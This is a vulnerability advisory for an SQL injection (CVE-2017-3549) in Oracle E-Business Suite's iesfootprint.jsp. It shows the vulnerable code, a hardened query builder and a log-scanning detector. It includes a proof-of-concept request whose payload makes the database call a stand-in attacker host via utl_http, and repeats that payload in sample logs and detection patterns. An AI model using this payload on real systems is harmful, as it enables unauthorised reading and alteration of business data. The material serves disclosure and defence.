ERPScan advisory ERPSCAN-17-021
History: Dec 23, 2016

SQL Injection in E-Business Suite IESFOOTPRINT

2016-12-23 00:00:00
erpscan.io

CVSS v3 base score: 9.1 High
Attack Vector: Network; Attack Complexity: Low; Privileges Required: None; User Interaction: None; Scope: Unchanged; Confidentiality Impact: High; Integrity Impact: High; Availability Impact: None
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CVSS v2 base score: 7.5 High
Access Vector: Network; Access Complexity: Low; Authentication: None; Confidentiality Impact: Partial; Integrity Impact: Partial; Availability Impact: Partial
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS: 0.013 Low (percentile 84.5%)

**Application:** Oracle E-Business Suite
**Versions Affected:** Oracle EBS 12.2.3
**Vendor:** Oracle
**Bugs:** SQL injection
**Reported:** 23.12.2016
**Vendor response:** 24.12.2016
**Date of Public Advisory:** 18.04.2017
**Reference:** Oracle CPU April 2017
**Authors:** Dmitry Chastuhin (ERPScan)

VULNERABILITY INFORMATION

Class: SQL injection
Impact: read sensitive data, modify or delete data from database
Remotely Exploitable: yes
Locally Exploitable: no
CVE: CVE-2017-3549

CVSS Information

CVSS Base Score v3: 9.1 / 10
CVSS Base Vector:

AV: Attack Vector (Related exploit range) Network (N)
AC: Attack Complexity (Required attack complexity) Low (L)
PR: Privileges Required (Level of privileges needed to exploit) None (N)
UI: User Interaction (Required user participation) None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U)
C: Impact to Confidentiality High (H)
I: Impact to Integrity High (H)
A: Impact to Availability None (N)

VULNERABILITY DESCRIPTION

iesfootprint.jsp builds an SQL statement by concatenating the request parameters dscriptId, deployDate and responseDate directly into the query text. An unauthenticated attacker who controls those parameters can alter the statement to read additional data from the database or to modify it without authorization.

VULNERABLE PACKAGES

Oracle EBS 12.2.3

SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, apply the Oracle Critical Patch Update (CPU) of April 2017.

TECHNICAL DESCRIPTION

Proof of Concept

The vulnerable JSP is iesfootprint.jsp (served under /OA_HTML/). In the excerpt below the request parameters dscriptId, deployDate and responseDate are concatenated straight into the query string:

```jsp
deployDate = ((request.getParameter("deployDate")) != null) ? request.getParameter("deployDate") : "";
responseDate = ((request.getParameter("responseDate")) != null) ? request.getParameter("responseDate") : "";
dscriptName = ((request.getParameter("dscript_name")) != null) ? request.getParameter("dscript_name") : "";
dscriptId = ((request.getParameter("dscriptId")) != null) ? request.getParameter("dscriptId") : "";
%>
<%
// Process the data based on params
if (showGraph) {
    // Create Query String
    StringBuffer query = new StringBuffer("SELECT panel_name, count_panels, avg_time, min_time, max_time, ");
    query.append("'").append(_prompts[10]).append("'");
    query.append(" Average_Time FROM (SELECT rownum, panel_name, count_panels, avg_time, min_time, max_time FROM (SELECT Panel_name, count(panel_name) count_panels, (sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000 min_time, max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE dscript_id = ");
    query.append(dscriptId);                                // request parameter, unquoted and unvalidated
    query.append(" AND start_time between ");
    query.append("'").append(deployDate).append("'");       // request parameter, quoted but not escaped
    query.append(" and ");
    query.append("'").append(responseDate).append("'");     // request parameter, quoted but not escaped
    query.append(" GROUP BY panel_name ORDER BY avg_time desc)) WHERE rownum < 11");
    // Get XMLDocument for the corresponding query and Paint graph
    try {
        XMLDocument xmlDoc = XMLServ.getSQLasXML(query.toString());   // concatenated text goes to the database as-is
        htmlString = XMLServ.getXMLTransform(xmlDoc, htmlURL);
```
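To make the two injection points concrete, the following added example (not code from the advisory or from Oracle) models the JSP's query construction in Python and places an assumed hardened builder beside it. `build_vulnerable_query` mirrors the StringBuffer concatenation above; `build_safe_query` is a hypothetical fix that validates dscriptId as an integer, parses the two dates (the `YYYY-MM-DD` mask is an assumption; a real instance uses its own date format), and returns constant SQL text with Oracle bind variables. `PROMPT_AVERAGE_TIME` stands in for `_prompts[10]`, and `IES_SVY_FOOTPRINT_V` is used only inside the SQL string; nothing here connects to a database.

```python
import re
from datetime import datetime

# Stand-in for the JSP's _prompts[10] column label (constructed value; the
# real one is localized text chosen by the server, not by the client).
PROMPT_AVERAGE_TIME = "Average Time"

_SELECT_HEAD = "SELECT panel_name, count_panels, avg_time, min_time, max_time, "
_SELECT_BODY = (
    " Average_Time FROM (SELECT rownum, panel_name, count_panels, avg_time, min_time, "
    "max_time FROM (SELECT Panel_name, count(panel_name) count_panels, "
    "(sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000 min_time, "
    "max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V WHERE dscript_id = "
)
_SELECT_TAIL = " GROUP BY panel_name ORDER BY avg_time desc)) WHERE rownum < 11"


def build_vulnerable_query(dscript_id, deploy_date, response_date):
    """Mirror the StringBuffer concatenation in iesfootprint.jsp. Each argument
    is the raw request parameter, used exactly as the JSP uses it."""
    query = _SELECT_HEAD + "'" + PROMPT_AVERAGE_TIME + "'" + _SELECT_BODY
    query += dscript_id                    # numeric context: injects with no quote at all
    query += " AND start_time between "
    query += "'" + deploy_date + "'"       # quoted but never escaped
    query += " and "
    query += "'" + response_date + "'"     # quoted but never escaped
    query += _SELECT_TAIL
    return query


# Hardened statement: every client-controlled value becomes an Oracle bind
# variable, so the SQL text is constant whatever the request carries.
SAFE_SQL = (
    "SELECT panel_name, count_panels, avg_time, min_time, max_time, :label Average_Time "
    "FROM (SELECT rownum, panel_name, count_panels, avg_time, min_time, max_time "
    "FROM (SELECT Panel_name, count(panel_name) count_panels, "
    "(sum(total_time)/count(panel_name))/1000 avg_time, min(min_time)/1000 min_time, "
    "max(max_time)/1000 max_time FROM IES_SVY_FOOTPRINT_V "
    "WHERE dscript_id = :dscript_id AND start_time between :deploy_date and :response_date "
    "GROUP BY panel_name ORDER BY avg_time desc)) WHERE rownum < 11"
)

_ID_RE = re.compile(r"\d{1,10}")
_DATE_MASK = "%Y-%m-%d"   # assumed input mask; use the instance's real date format


def build_safe_query(dscript_id, deploy_date, response_date):
    """Assumed fix (not Oracle's patch): validate each parameter into its real
    type and return (sql, binds) ready for cursor.execute(sql, binds)."""
    if not _ID_RE.fullmatch(dscript_id):
        raise ValueError("dscriptId must be a positive integer")
    binds = {"label": PROMPT_AVERAGE_TIME, "dscript_id": int(dscript_id)}
    for key, name, raw in (("deploy_date", "deployDate", deploy_date),
                           ("response_date", "responseDate", response_date)):
        try:
            binds[key] = datetime.strptime(raw, _DATE_MASK)
        except ValueError:
            raise ValueError(f"{name} must match {_DATE_MASK}") from None
    return SAFE_SQL, binds


def is_rejected(dscript_id, deploy_date, response_date):
    """True when the hardened builder refuses the parameters."""
    try:
        build_safe_query(dscript_id, deploy_date, response_date)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Payload shaped like the advisory's PoC, placed in the unquoted dscriptId.
    payload = "11' AND utl_http.request('http://attackers_host/lalal')='1' GROUP BY panel_name)) --"
    print(build_vulnerable_query(payload, "2016-12-01", "2016-12-23"))
    print("hardened builder rejects payload:", is_rejected(payload, "2016-12-01", "2016-12-23"))
```

The point of `build_safe_query` is that the SQL text never changes: the three values travel to the database as typed binds, so a quote or a trailing `--` is data, not syntax. Validation before binding is still worthwhile, since it turns a malformed request into a clean 4xx instead of an ORA error page.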

Approximate request with SQL injection:

http://ebs.example.com/OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11' AND utl_http.request('http://attackers_host/lalal')='1' GROUP BY panel_name)) --

Because dscriptId is appended without surrounding quotes, the numeric context accepts an injected expression with no quote character at all; the quoted deployDate and responseDate parameters are likewise unescaped. The utl_http.request() call in the request above is an out-of-band check (the database itself fetches a URL on the attacker's host), which only succeeds when the EBS database account has EXECUTE on UTL_HTTP and the database's network ACL permits the outbound connection; without that, the injection can still be confirmed with in-band or error-based techniques.
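For the detection side, here is an added example (not part of the advisory) that scans Apache/OHS combined-format access log lines for requests to iesfootprint.jsp whose dscriptId is not a plain integer, whose deployDate or responseDate do not look like dates, or whose parameters carry SQL metacharacters or the UTL_HTTP, UTL_INADDR and DBMS_* package names typical of out-of-band Oracle injection. The log lines are constructed, the `YYYY-MM-DD` date shape is an assumption (the real mask depends on the instance's date settings), and the path check assumes the page is served under /OA_HTML/ as in the PoC URL above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in Apache/OHS combined format (not real
# traffic). Line 2 carries a payload shaped like the advisory's PoC in the
# unquoted dscriptId; line 3 injects into the quoted deployDate parameter.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Dec/2016:10:01:12 +0000] "GET /OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11&deployDate=2016-12-01&responseDate=2016-12-23 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Dec/2016:10:02:40 +0000] "GET /OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11%27%20AND%20utl_http.request(%27http://attackers_host/lalal%27)%3D%271%27%20GROUP%20BY%20panel_name))%20-- HTTP/1.1" 500 312 "-" "python-requests/2.12.4"
198.51.100.7 - - [23/Dec/2016:10:03:01 +0000] "GET /OA_HTML/iesfootprint.jsp?showgraph=true&dscriptId=11&deployDate=2016-12-01%27%20OR%20%271%27%3D%271&responseDate=2016-12-23 HTTP/1.1" 200 5123 "-" "python-requests/2.12.4"
10.0.0.9 - - [23/Dec/2016:10:04:15 +0000] "GET /OA_HTML/RF.jsp?function_id=1 HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Expected shape of each parameter iesfootprint.jsp splices into SQL.
# The date mask is an assumption; adjust it to the instance's date format.
EXPECTED_SHAPE = {
    "dscriptId": re.compile(r"\d{1,10}"),
    "deployDate": re.compile(r"\d{4}-\d{2}-\d{2}"),
    "responseDate": re.compile(r"\d{4}-\d{2}-\d{2}"),
}

# Generic Oracle SQL-injection indicators, checked against every parameter.
INDICATORS = {
    "quote": re.compile(r"'"),
    "comment": re.compile(r"--|/\*"),
    "utl_http": re.compile(r"\butl_http\b", re.I),
    "utl_inaddr": re.compile(r"\butl_inaddr\b", re.I),
    "dbms_pkg": re.compile(r"\bdbms_\w+", re.I),
    "union_select": re.compile(r"\bunion\b|\bselect\b", re.I),
}


def inspect_request(target):
    """Return the reasons a request target looks like an injection attempt
    against iesfootprint.jsp, or [] if it is clean or aimed at another page."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/oa_html/iesfootprint.jsp"):
        return []
    reasons = []
    params = parse_qs(parts.query, keep_blank_values=True)   # percent-decodes values
    for name, values in params.items():
        for value in values:
            shape = EXPECTED_SHAPE.get(name)
            if shape and not shape.fullmatch(value):
                reasons.append("malformed:" + name)
            for label, pattern in INDICATORS.items():
                tag = "indicator:" + label
                if pattern.search(value) and tag not in reasons:
                    reasons.append(tag)
    return reasons


def scan_log(text):
    """Parse combined-format lines and return one finding per suspicious request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = inspect_request(m.group("target"))
        if reasons:
            findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                             "status": int(m.group("status")), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The shape check is the stronger of the two rules: a parameter the page treats as a number or a date has no legitimate reason to contain anything else, so it catches payloads that avoid quotes and comment sequences entirely (for example `dscriptId=11 OR 1=1`). The indicator list is there to catch the same traffic on other EBS pages once the path filter is widened.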
